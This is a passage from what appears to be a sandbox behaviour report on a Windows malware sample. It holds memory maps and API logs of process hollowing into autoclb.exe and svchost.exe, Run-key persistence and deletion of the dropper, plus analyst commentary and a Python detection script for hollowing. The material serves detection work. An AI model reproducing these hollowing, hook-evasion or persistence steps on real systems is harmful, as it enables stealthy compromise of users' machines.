imm32.dll 0x75400000 0x7542afff Memory Mapped File rwx False False False -
shell32.dll 0x75430000 0x767eefff Memory Mapped File rwx False False False -
profapi.dll 0x76810000 0x7681efff Memory Mapped File rwx False False False -
advapi32.dll 0x76a10000 0x76a8afff Memory Mapped File rwx False False False -
sechost.dll 0x76c40000 0x76c82fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x76d90000 0x76e3bfff Memory Mapped File rwx False False False -
combase.dll 0x76e40000 0x76ff9fff Memory Mapped File rwx False False False -
gdi32.dll 0x77000000 0x7714cfff Memory Mapped File rwx False False False -
user32.dll 0x77150000 0x7728ffff Memory Mapped File rwx False False False -
shlwapi.dll 0x77290000 0x772d3fff Memory Mapped File rwx False False False -
shcore.dll 0x77340000 0x773ccfff Memory Mapped File rwx False False False -
windows.storage.dll 0x773f0000 0x778ccfff Memory Mapped File rwx False False False -
msctf.dll 0x778d0000 0x779effff Memory Mapped File rwx False False False -
msvcrt.dll 0x779f0000 0x77aadfff Memory Mapped File rwx False False False -
kernel.appcore.dll 0x77c30000 0x77c3bfff Memory Mapped File rwx False False False -
ntdll.dll 0x77ca0000 0x77e18fff Memory Mapped File rwx False False False -
pagefile_0x000000007feb0000 0x7feb0000 0x7ffaffff Pagefile Backed Memory r True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffd8000 0x7ffd8000 0x7ffdafff Private Memory rw True False False -
private_0x000000007ffdb000 0x7ffdb000 0x7ffddfff Private Memory rw True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x000000007fff0000 0x7fff0000 0x7ff8ee37ffff Private Memory r True False False -
ntdll.dll 0x7ff8ee380000 0x7ff8ee541fff Memory Mapped File rwx False False False -
private_0x00007ff8ee542000 0x7ff8ee542000 0x7ffffffeffff Private Memory r True False False -
Host Behavior
File (24)
Operation Filename Additional Information Success Count
Create C:\Windows\SYSTEM32\ntdll.dll desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE True 3
Create C:\Windows\SYSTEM32\ntdll.dll desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE True 4
Get Info C:\Windows\SYSTEM32\ntdll.dll type = size True 3
Get Info C:\Windows\SYSTEM32\ntdll.dll type = size True 4
Open STD_INPUT_HANDLE - True 1
Open STD_OUTPUT_HANDLE - True 1
Open STD_ERROR_HANDLE - True 1
Read C:\Windows\SYSTEM32\ntdll.dll size = 1533496, size_out = 1533496 True 3
Read C:\Windows\SYSTEM32\ntdll.dll size = 1533496, size_out = 1533496 True 4
Process (1)
Operation Process Additional Information Success Count
Create C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe os_pid = 0xfb8, creation_flags = CREATE_SUSPENDED, CREATE_NO_WINDOW, show_window = SW_HIDE True 1
Thread (3)
Operation Process Additional Information Success Count
Get Context c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe os_tid = 0xfac True 1
Set Context c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe os_tid = 0xfac True 1
Resume c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe os_tid = 0xfac True 1
Memory (2)
Operation Process Additional Information Success Count
Read C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe address = 0x7ffde008, size = 4 True 1
Write C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe address = 0x7ffde008, size = 4 True 1
Module (14)
Operation Module Additional Information Success Count
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75260000 True 2
Get Filename - process_name = c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe, size = 260 True 1
Get Filename - process_name = c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe, size = 259 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x7527a330 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x75277580 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x75279910 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x7527f400 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x75278b70 True 2
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x752874f0 True 1
Create Mapping - protection = PAGE_EXECUTE_READWRITE, maximum_size = 1642368 True 1
Map - process_name = C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x400000 True 1
Map - process_name = c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x1f10000 True 1
Environment (1)
Operation Additional Information Success Count
Get Environment String - True 1
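Process #6 is the loader stage, and its rows are the textbook sequence of section-based process hollowing: a second copy of its own image is created with CREATE_SUSPENDED, CREATE_NO_WINDOW and SW_HIDE; a PAGE_EXECUTE_READWRITE section of 1642368 bytes is created and mapped twice, once into the child at 0x400000 (the image base of autoclb.exe, as Process #7's region list shows, where a pagefile-backed rwx view and the original image now both sit at 0x400000) and once locally at 0x1f10000 (the rwx pagefile-backed region in Process #6's own list); the child then gets a 4-byte read and write at 0x7ffde008 before Get Context, Set Context and Resume. Because both views are backed by the same section, whatever the loader writes into its local view appears in the child without a WriteProcessMemory of the payload, which is why the only cross-process memory operations in the trace are that single 4-byte read and write. Their address is offset 8 into the 4 KB page at 0x7ffde000, and on a 32-bit PEB offset 8 is ImageBaseAddress, so the write is consistent with pointing the suspended child at the freshly mapped image. Two caveats for anyone writing a rule from this trace: the full-size reads of C:\Windows\SYSTEM32\ntdll.dll from disk (1533496 bytes, seven times in total) are consistent with a loader keeping a clean copy of ntdll to avoid user-mode hooks, so API-name-based detection may see less than this sandbox did; and the thread operations are recorded against os_tid = 0xfac, which is listed under Process #6's own thread IDs rather than Process #7's, so a rule that insists the context-set thread belongs to the child would miss this trace and should key on the target process instead. The following Python is an added example, not code from the report or from the sample: it encodes the five steps as a score over constructed records that mirror the rows above. The Op layout, the field names, the function names and the threshold are assumptions made for this example.

```python
from __future__ import annotations

from dataclasses import dataclass, field
from typing import Optional

PAGE = 0x1000
PEB32_IMAGE_BASE_OFFSET = 0x8   # offset of ImageBaseAddress in the 32-bit PEB


@dataclass
class Op:
    """One monitored call, constructed for this example to mirror a report row."""
    pid: int                          # process that made the call
    kind: str                         # process_create | mem_read | mem_write | map_view | get_context | set_context | resume
    target_pid: Optional[int] = None  # process the call acts on
    info: dict = field(default_factory=dict)


def is_peb_image_base_patch(op: Op) -> bool:
    """A 4-byte cross-process write at offset 8 into a page is how a 32-bit
    hollower updates PEB->ImageBaseAddress. Testing the page offset rather
    than the literal 0x7ffde008 keeps the check valid under ASLR."""
    return (op.kind == "mem_write"
            and op.info.get("size") == 4
            and op.info.get("address", 0) % PAGE == PEB32_IMAGE_BASE_OFFSET)


STEPS = ("suspended", "peb_patch", "rwx_map", "set_context", "resumed")


def hollowing_indicators(ops: list[Op]) -> dict[int, dict]:
    """For every child created with CREATE_SUSPENDED, record which of the
    hollowing steps its creating process later performed against it."""
    children: dict[int, dict] = {}
    for op in ops:
        if op.kind == "process_create" and "CREATE_SUSPENDED" in op.info.get("creation_flags", ""):
            children[op.target_pid] = dict.fromkeys(STEPS, False)
            children[op.target_pid].update(parent=op.pid, suspended=True)
    for op in ops:
        ind = children.get(op.target_pid)
        if ind is None or op.pid != ind["parent"]:
            continue                        # not the parent acting on its suspended child
        if is_peb_image_base_patch(op):
            ind["peb_patch"] = True
        elif op.kind == "map_view" and op.info.get("protection") == "PAGE_EXECUTE_READWRITE":
            ind["rwx_map"] = True           # payload section mapped into the child
            ind["map_address"] = op.info.get("address")
        elif op.kind == "set_context":
            ind["set_context"] = True       # entry point / image base set in the thread context
        elif op.kind == "resume":
            ind["resumed"] = True
    return children


def score(ind: dict) -> int:
    return sum(1 for k in STEPS if ind.get(k))


def detect_hollowing(ops: list[Op], threshold: int = 4) -> dict[int, dict]:
    """Children for which at least `threshold` of the five steps were observed."""
    return {pid: ind for pid, ind in hollowing_indicators(ops).items() if score(ind) >= threshold}


PAYLOAD = r"C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe"

# Constructed from the Process #6 rows above (0xfa8 acting on 0xfb8). The
# local map at 0x1f10000 targets the loader itself and must not count; the
# last record is cmd.exe #5 creating #6 without CREATE_SUSPENDED, as a control.
SAMPLE = [
    Op(0xfa8, "process_create", 0xfb8, {"image": PAYLOAD,
                                        "creation_flags": "CREATE_SUSPENDED, CREATE_NO_WINDOW",
                                        "show_window": "SW_HIDE"}),
    Op(0xfa8, "mem_read", 0xfb8, {"address": 0x7ffde008, "size": 4}),
    Op(0xfa8, "mem_write", 0xfb8, {"address": 0x7ffde008, "size": 4}),
    Op(0xfa8, "map_view", 0xfb8, {"protection": "PAGE_EXECUTE_READWRITE", "address": 0x400000}),
    Op(0xfa8, "map_view", 0xfa8, {"protection": "PAGE_EXECUTE_READWRITE", "address": 0x1f10000}),
    Op(0xfa8, "get_context", 0xfb8, {"tid": 0xfac}),
    Op(0xfa8, "set_context", 0xfb8, {"tid": 0xfac}),
    Op(0xfa8, "resume", 0xfb8, {"tid": 0xfac}),
    Op(0xf9c, "process_create", 0xfa8, {"image": PAYLOAD,
                                        "creation_flags": "CREATE_EXTENDED_STARTUPINFO_PRESENT"}),
]

if __name__ == "__main__":
    for pid, ind in detect_hollowing(SAMPLE).items():
        print(f"pid {pid:#x}: {score(ind)}/5 hollowing steps, payload mapped at {ind['map_address']:#x}")
```

The rule deliberately does not look at the thread id on the context and resume calls, for the reason given above, and it does not require a WriteProcessMemory of the payload, since a section mapped into both processes never produces one; the rwx map into the child plus the PEB patch carry that signal instead.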
Process #7: autoclb.exe
Information Value
ID #7
File Name c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe
Command Line "C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe" "C:\Users\CIIHMN~1\Desktop\educat.exe"
Initial Working Directory C:\Users\CIiHmnxMn6Ps\Desktop\
Monitor Start Time: 00:01:09, Reason: Child Process
Unmonitor End Time: 00:01:18, Reason: Self Terminated
Monitor Duration 00:00:09
OS Process Information
Information Value
PID 0xfb8
Parent PID 0xfa8 (c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0xFBC, 0xFC0, 0xFC4
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
private_0x0000000000020000 0x00020000 0x00023fff Private Memory rw True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory rw True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory rw True False False -
pagefile_0x0000000000040000 0x00040000 0x00053fff Pagefile Backed Memory r True False False -
private_0x0000000000060000 0x00060000 0x0009ffff Private Memory rw True False False -
private_0x0000000000060000 0x00060000 0x0015ffff Private Memory rw True False False -
private_0x00000000000a0000 0x000a0000 0x0019ffff Private Memory rw True False False -
private_0x0000000000160000 0x00160000 0x00160fff Private Memory rw True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a3fff Pagefile Backed Memory r True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory r True False False -
private_0x00000000001c0000 0x001c0000 0x001c1fff Private Memory rw True False False -
private_0x00000000001d0000 0x001d0000 0x0020ffff Private Memory rw True False False -
private_0x0000000000210000 0x00210000 0x00210fff Private Memory rw True False False -
private_0x0000000000220000 0x00220000 0x0022ffff Private Memory rw True False False -
locale.nls 0x00230000 0x002edfff Memory Mapped File r False False False -
private_0x00000000002f0000 0x002f0000 0x003effff Private Memory rw True False False -
autoclb.exe 0x00400000 0x00512fff Memory Mapped File rwx True False False -
pagefile_0x0000000000400000 0x00400000 0x00470fff Pagefile Backed Memory rwx True False False -
private_0x0000000000480000 0x00480000 0x004bffff Private Memory rw True False False -
private_0x00000000004d0000 0x004d0000 0x004dffff Private Memory rw True False False -
private_0x00000000004e0000 0x004e0000 0x005dffff Private Memory rw True False False -
private_0x0000000000610000 0x00610000 0x0070ffff Private Memory rw True False False -
pagefile_0x0000000000710000 0x00710000 0x00897fff Pagefile Backed Memory r True False False -
pagefile_0x00000000008a0000 0x008a0000 0x00a20fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000a30000 0x00a30000 0x01e2ffff Pagefile Backed Memory r True False False -
private_0x0000000001e30000 0x01e30000 0x0223ffff Private Memory rw True False False -
sortdefault.nls 0x02240000 0x02576fff Memory Mapped File r False False False -
private_0x0000000002580000 0x02580000 0x02741fff Private Memory rw True False False -
pagefile_0x0000000002580000 0x02580000 0x026b2fff Pagefile Backed Memory rwx True False False -
private_0x00000000026c0000 0x026c0000 0x02881fff Private Memory rw True False False -
wow64cpu.dll 0x64ae0000 0x64ae7fff Memory Mapped File rwx False False False -
wow64win.dll 0x64af0000 0x64b62fff Memory Mapped File rwx False False False -
wow64.dll 0x64b70000 0x64bbefff Memory Mapped File rwx False False False -
devobj.dll 0x74b10000 0x74b30fff Memory Mapped File rwx False False False -
bcryptprimitives.dll 0x74d40000 0x74d98fff Memory Mapped File rwx False False False -
cryptbase.dll 0x74da0000 0x74da9fff Memory Mapped File rwx False False False -
sspicli.dll 0x74db0000 0x74dcdfff Memory Mapped File rwx False False False -
kernelbase.dll 0x74e70000 0x74fe5fff Memory Mapped File rwx False False False -
cfgmgr32.dll 0x75220000 0x75255fff Memory Mapped File rwx False False False -
kernel32.dll 0x75260000 0x7534ffff Memory Mapped File rwx False False False -
powrprof.dll 0x753b0000 0x753f3fff Memory Mapped File rwx False False False -
imm32.dll 0x75400000 0x7542afff Memory Mapped File rwx False False False -
shell32.dll 0x75430000 0x767eefff Memory Mapped File rwx False False False -
profapi.dll 0x76810000 0x7681efff Memory Mapped File rwx False False False -
ole32.dll 0x768b0000 0x76999fff Memory Mapped File rwx False False False -
advapi32.dll 0x76a10000 0x76a8afff Memory Mapped File rwx False False False -
setupapi.dll 0x76a90000 0x76c34fff Memory Mapped File rwx False False False -
sechost.dll 0x76c40000 0x76c82fff Memory Mapped File rwx False False False -
msasn1.dll 0x76d30000 0x76d3dfff Memory Mapped File rwx False False False -
wintrust.dll 0x76d40000 0x76d81fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x76d90000 0x76e3bfff Memory Mapped File rwx False False False -
combase.dll 0x76e40000 0x76ff9fff Memory Mapped File rwx False False False -
gdi32.dll 0x77000000 0x7714cfff Memory Mapped File rwx False False False -
user32.dll 0x77150000 0x7728ffff Memory Mapped File rwx False False False -
shlwapi.dll 0x77290000 0x772d3fff Memory Mapped File rwx False False False -
shcore.dll 0x77340000 0x773ccfff Memory Mapped File rwx False False False -
windows.storage.dll 0x773f0000 0x778ccfff Memory Mapped File rwx False False False -
msctf.dll 0x778d0000 0x779effff Memory Mapped File rwx False False False -
msvcrt.dll 0x779f0000 0x77aadfff Memory Mapped File rwx False False False -
crypt32.dll 0x77ab0000 0x77c24fff Memory Mapped File rwx False False False -
kernel.appcore.dll 0x77c30000 0x77c3bfff Memory Mapped File rwx False False False -
ntdll.dll 0x77ca0000 0x77e18fff Memory Mapped File rwx False False False -
pagefile_0x000000007feb0000 0x7feb0000 0x7ffaffff Pagefile Backed Memory r True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffd5000 0x7ffd5000 0x7ffd7fff Private Memory rw True False False -
private_0x000000007ffd8000 0x7ffd8000 0x7ffdafff Private Memory rw True False False -
private_0x000000007ffdb000 0x7ffdb000 0x7ffddfff Private Memory rw True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x000000007fff0000 0x7fff0000 0x7ff8ee37ffff Private Memory r True False False -
ntdll.dll 0x7ff8ee380000 0x7ff8ee541fff Memory Mapped File rwx False False False -
private_0x00007ff8ee542000 0x7ff8ee542000 0x7ffffffeffff Private Memory r True False False -
Injection Information
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #6: c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe 0xfac address = 0x400000, size = 462848 True 1 Fn
Modify Memory #6: c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe 0xfac address = 0x7ffde008, size = 4 True 1 Fn, Data
Modify Control Flow #6: c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe 0xfac os_tid = 0xfbc, address = 0x77d0aef0 True 1 Fn
Host Behavior
File (9)
Operation Filename Additional Information Success Count Logfile
Create C:\Users\CIIHMN~1\AppData\Local\Temp\98F9CE91 desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1 Fn
Create C:\Windows\system32\c_1252.nls desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 3 Fn
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw - False 1 Fn
Get Info C:\Windows\system32\c_1252.nls type = time True 1 Fn
Get Info C:\Windows\system32\c_1252.nls type = time True 1 Fn
Get Info C:\Windows\system32\c_1252.nls type = time True 1 Fn
Delete C:\Users\CIIHMN~1\Desktop\educat.exe - True 1 Fn
Registry (12)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1 Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1 Fn
Open Key HKEY_USERS - True 1 Fn
Open Key HKEY_USERS\S-1-5-21-1462094071-1423818996-289466292-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders - True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = InstallDate, data = 65 True 1 Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = cabilipc, data = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe, type = REG_SZ True 1 Fn
Read Value HKEY_USERS\S-1-5-21-1462094071-1423818996-289466292-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders value_name = AppData, data = 0, type = REG_SZ True 1 Fn
Read Value HKEY_USERS\S-1-5-21-1462094071-1423818996-289466292-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders value_name = AppData, data = C:\Users\CIiHmnxMn6Ps\AppData\Roaming, type = REG_SZ True 1 Fn
Enumerate Keys HKEY_USERS - True 1 Fn
Enumerate Keys HKEY_USERS - True 1 Fn
Enumerate Keys HKEY_USERS - True 1 Fn
Enumerate Keys HKEY_USERS - True 1 Fn
Process (3)
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\svchost.exe os_pid = 0xfd8, creation_flags = CREATE_SUSPENDED, CREATE_DEFAULT_ERROR_MODE, show_window = SW_HIDE True 1 Fn
Open c:\windows\explorer.exe desired_access = PROCESS_QUERY_INFORMATION True 1 Fn
Open c:\windows\explorer.exe desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_SET_SESSIONID, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_DUP_HANDLE, PROCESS_CREATE_PROCESS, PROCESS_SET_QUOTA, PROCESS_SET_INFORMATION, PROCESS_QUERY_INFORMATION, PROCESS_SUSPEND_RESUME, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE True 1 Fn
Thread (6)
Operation Process Additional Information Success Count Logfile
Suspend c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe os_tid = 0xfc4 True 1 Fn
Get Context c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe os_tid = 0xfc4 True 2 Fn
Set Context c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe os_tid = 0xfc4 True 1 Fn
Resume c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe os_tid = 0xfc4 True 2 Fn
Memory (5)
Operation Process Additional Information Success Count Logfile
Allocate C:\Windows\system32\svchost.exe address = 0x5df0c0, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 6156476 True 1 Fn
Protect C:\Windows\system32\svchost.exe address = 0x7ff673b43440, protection = PAGE_EXECUTE_READWRITE, size = 6157816 True 1 Fn
Protect C:\Windows\system32\svchost.exe address = 0x7ff673b43000, protection = PAGE_EXECUTE_READ, size = 6157816 True 1 Fn
Write C:\Windows\system32\svchost.exe address = 0x700000, size = 792 True 1 Fn, Data
Write C:\Windows\system32\svchost.exe address = 0x7ff673b43440, size = 4 True 1 Fn, Data
Module (48)
Operation Module Additional Information Success Count Logfile
Get Handle c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe base_address = 0x400000 True 3 Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75260000 True 2 Fn
Get Handle c:\windows\syswow64\user32.dll base_address = 0x77150000 True 2 Fn
Get Handle c:\windows\syswow64\ntdll.dll base_address = 0x77ca0000 True 17 Fn
Get Filename c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe process_name = c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe, size = 260 True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsWow64Process, address_out = 0x752796e0 True 1 Fn
Get Address c:\windows\syswow64\user32.dll function = GetWindowThreadProcessId, address_out = 0x7716ba70 True 2 Fn
Get Address c:\windows\syswow64\kernel32.dll function = Wow64EnableWow64FsRedirection, address_out = 0x7529b6a0 True 1 Fn
Get Address c:\windows\syswow64\ntdll.dll function = ZwWow64QueryInformationProcess64, address_out = 0x77d0a840 True 15 Fn
Get Address c:\windows\syswow64\ntdll.dll function = ZwWow64ReadVirtualMemory64, address_out = 0x77d0a860 True 1 Fn
Create Mapping - protection = PAGE_EXECUTE_READWRITE, maximum_size = 6157784 True 1 Fn
Map - process_name = c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x2580000 True 1 Fn
Map - process_name = C:\Windows\system32\svchost.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x5c0000 True 1 Fn
Window (2)
Operation Window Name Additional Information Success Count Logfile
Find - class_name = ProgMan True 2 Fn
System (17)
Operation Additional Information Success Count Logfile
Get Computer Name result_out = LHNIWSJ True 1 Fn
Sleep duration = 500 milliseconds (0.500 seconds) True 10 Fn
Sleep duration = 100 milliseconds (0.100 seconds) True 1 Fn
Get Time type = Ticks, time = 150796 True 1 Fn
Get Info type = Operating System True 1 Fn
Get Info type = SYSTEM_PROCESS_INFORMATION False 1 Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1 Fn
Get Info type = Operating System False 1 Fn
Process #8: svchost.exe
173 0
Information Value
ID #8
File Name c:\windows\system32\svchost.exe
Command Line C:\Windows\system32\svchost.exe
Initial Working Directory C:\Users\CIiHmnxMn6Ps\Desktop\
Monitor Start Time: 00:01:16, Reason: Child Process
Unmonitor End Time: 00:01:21, Reason: Self Terminated
Monitor Duration 00:00:05
OS Process Information
Information Value
PID 0xfd8
Parent PID 0xfb8 (c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0xFDC, 0xFE0
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
pagefile_0x00000000005c0000 0x005c0000 0x006f2fff Pagefile Backed Memory rwx True False False -
private_0x0000000000700000 0x00700000 0x00700fff Private Memory rwx True False False -
private_0x000000007f53f000 0x7f53f000 0x7f53ffff Private Memory rw True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x0000009eda5c0000 0x9eda5c0000 0x9eda5dffff Private Memory rw True False False -
pagefile_0x0000009eda5c0000 0x9eda5c0000 0x9eda5cffff Pagefile Backed Memory rw True False False -
svchost.exe.mui 0x9eda5d0000 0x9eda5d0fff Memory Mapped File r False False False -
pagefile_0x0000009eda5e0000 0x9eda5e0000 0x9eda5f3fff Pagefile Backed Memory r True False False -
private_0x0000009eda600000 0x9eda600000 0x9eda67ffff Private Memory rw True False False -
pagefile_0x0000009eda680000 0x9eda680000 0x9eda683fff Pagefile Backed Memory r True False False -
pagefile_0x0000009eda690000 0x9eda690000 0x9eda690fff Pagefile Backed Memory r True False False -
private_0x0000009eda6a0000 0x9eda6a0000 0x9eda6a1fff Private Memory rw True False False -
private_0x0000009eda6b0000 0x9eda6b0000 0x9eda72ffff Private Memory rw True False False -
private_0x0000009eda730000 0x9eda730000 0x9eda730fff Private Memory rw True False False -
private_0x0000009eda740000 0x9eda740000 0x9eda746fff Private Memory rw True False False -
imm32.dll 0x9eda750000 0x9eda783fff Memory Mapped File r False False False -
private_0x0000009eda750000 0x9eda750000 0x9eda750fff Private Memory rw True False False -
private_0x0000009eda800000 0x9eda800000 0x9eda8fffff Private Memory rw True False False -
locale.nls 0x9eda900000 0x9eda9bdfff Memory Mapped File r False False False -
private_0x0000009eda9c0000 0x9eda9c0000 0x9edab4cfff Private Memory rw True False False -
private_0x0000009eda9c0000 0x9eda9c0000 0x9edaa6cfff Private Memory rw True False False -
private_0x0000009edab40000 0x9edab40000 0x9edab4cfff Private Memory rw True False False -
private_0x0000009edab50000 0x9edab50000 0x9edad4ffff Private Memory rw True False False -
private_0x0000009edac00000 0x9edac00000 0x9edacfffff Private Memory rw True False False -
pagefile_0x0000009edad00000 0x9edad00000 0x9edae87fff Pagefile Backed Memory r True False False -
pagefile_0x0000009edae90000 0x9edae90000 0x9edb010fff Pagefile Backed Memory r True False False -
pagefile_0x0000009edb020000 0x9edb020000 0x9edc41ffff Pagefile Backed Memory r True False False -
private_0x0000009edc420000 0x9edc420000 0x9edc61ffff Private Memory rw True False False -
private_0x0000009edc500000 0x9edc500000 0x9edc5fffff Private Memory rw True False False -
pagefile_0x00007df5ffa70000 0x7df5ffa70000 0x7ff5ffa6ffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff673330000 0x7ff673330000 0x7ff67342ffff Pagefile Backed Memory r True False False -
pagefile_0x00007ff673430000 0x7ff673430000 0x7ff673452fff Pagefile Backed Memory r True False False -
private_0x00007ff673454000 0x7ff673454000 0x7ff673454fff Private Memory rw True False False -
private_0x00007ff67345c000 0x7ff67345c000 0x7ff67345dfff Private Memory rw True False False -
private_0x00007ff67345e000 0x7ff67345e000 0x7ff67345ffff Private Memory rw True False False -
svchost.exe 0x7ff673b40000 0x7ff673b4cfff Memory Mapped File rwx False False False -
msvfw32.dll 0x7ff8d4970000 0x7ff8d4998fff Memory Mapped File rwx False False False -
comctl32.dll 0x7ff8d4c40000 0x7ff8d4ce9fff Memory Mapped File rwx False False False -
msacm32.dll 0x7ff8d50b0000 0x7ff8d50cbfff Memory Mapped File rwx False False False -
avifil32.dll 0x7ff8d50d0000 0x7ff8d50effff Memory Mapped File rwx False False False -
winmmbase.dll 0x7ff8db910000 0x7ff8db93bfff Memory Mapped File rwx False False False -
winmm.dll 0x7ff8db940000 0x7ff8db962fff Memory Mapped File rwx False False False -
devobj.dll 0x7ff8e9720000 0x7ff8e9746fff Memory Mapped File rwx False False False -
powrprof.dll 0x7ff8eadd0000 0x7ff8eae19fff Memory Mapped File rwx False False False -
kernel.appcore.dll 0x7ff8eae20000 0x7ff8eae2efff Memory Mapped File rwx False False False -
profapi.dll 0x7ff8eae30000 0x7ff8eae42fff Memory Mapped File rwx False False False -
cfgmgr32.dll 0x7ff8eaf60000 0x7ff8eafa3fff Memory Mapped File rwx False False False -
windows.storage.dll 0x7ff8eb180000 0x7ff8eb7a7fff Memory Mapped File rwx False False False -
shcore.dll 0x7ff8eb7b0000 0x7ff8eb862fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7ff8eb870000 0x7ff8eba4cfff Memory Mapped File rwx False False False -
user32.dll 0x7ff8ebdc0000 0x7ff8ebf0dfff Memory Mapped File rwx False False False -
msctf.dll 0x7ff8ec0c0000 0x7ff8ec21bfff Memory Mapped File rwx False False False -
sechost.dll 0x7ff8ec240000 0x7ff8ec29afff Memory Mapped File rwx False False False -
